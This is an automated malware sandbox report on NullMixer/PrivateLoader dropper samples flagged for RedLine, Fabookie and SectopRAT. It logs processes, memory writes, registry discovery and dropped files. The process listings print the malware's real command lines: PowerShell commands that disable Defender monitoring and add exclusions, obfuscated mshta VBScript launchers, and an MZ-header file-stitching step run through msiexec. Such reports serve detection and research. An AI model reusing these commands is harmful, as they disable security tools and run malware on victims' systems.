PID 2752 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe

"C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c9e031f4.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1932df4dae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193e530416b51740a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c28f648204dbd4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1968b7ee9058232e8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue196397c0f84f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue192c34b1c2f5.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue197e9ec0ff0.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193129b31e741ef3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19cef5687a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19d1fc7d2654d7a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19cd42a7c874e44.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b4b38a7569a9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c28f648204dbd4.exe

Tue19c28f648204dbd4.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe

Tue19b4b38a7569a9.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cd42a7c874e44.exe

Tue19cd42a7c874e44.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19ac3c92c21.exe

Tue19ac3c92c21.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue197e9ec0ff0.exe

Tue197e9ec0ff0.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe

Tue196397c0f84f8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cef5687a.exe

Tue19cef5687a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe

Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe

Tue1932df4dae.exe

C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp

"C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp" /SL5="$80192,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe

Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1968b7ee9058232e8.exe

Tue1968b7ee9058232e8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe

Tue19c9e031f4.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe

Tue192c34b1c2f5.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe

Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe

Tue193129b31e741ef3.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe"

C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp

"C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp" /SL5="$A019E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 488

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe") do taskkill -iM "%~nXx" /f

C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe

~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Tue1932df4dae.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y .\bENCc.E

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

Network


Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe

\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libcurlpp.dll

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libstdc++-6.dll

\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libgcc_s_dw2-1.dll

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe

\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19ac3c92c21.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe

\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue197e9ec0ff0.exe

C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7QURGKV1BLVSU6TPY56V.temp

C:\Users\Admin\AppData\Local\Temp\is-O3K3C.tmp\_isetup\_shfoldr.dll

C:\Users\Admin\AppData\Local\Temp\is-O3K3C.tmp\idp.dll

\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cef5687a.exe

\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cd42a7c874e44.exe

\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c28f648204dbd4.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1968b7ee9058232e8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe

\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libcurl.dll

\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libwinpthread-1.dll

C:\Users\Admin\AppData\Local\Temp\Cab620D.tmp


Analysis: behavioral13

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240903-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe

"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe"

C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe

"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe" -u

Network

Country Destination Domain Proto
US 8.8.8.8:53 t.gogamec.com udp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

72s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06384ea2548.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06d8092a5ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068cfd71e196da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0639114ac9fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062a0488e6dd1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0625413f2fb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GPT0L.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06d8092a5ae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068cfd71e196da.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-GPT0L.tmp\Wed067fa7edd4b875a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0639114ac9fa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0625413f2fb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062a0488e6dd1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0625413f2fb.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3276 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe
PID 3036 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 4404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5108 wrote to memory of 4788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3036 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
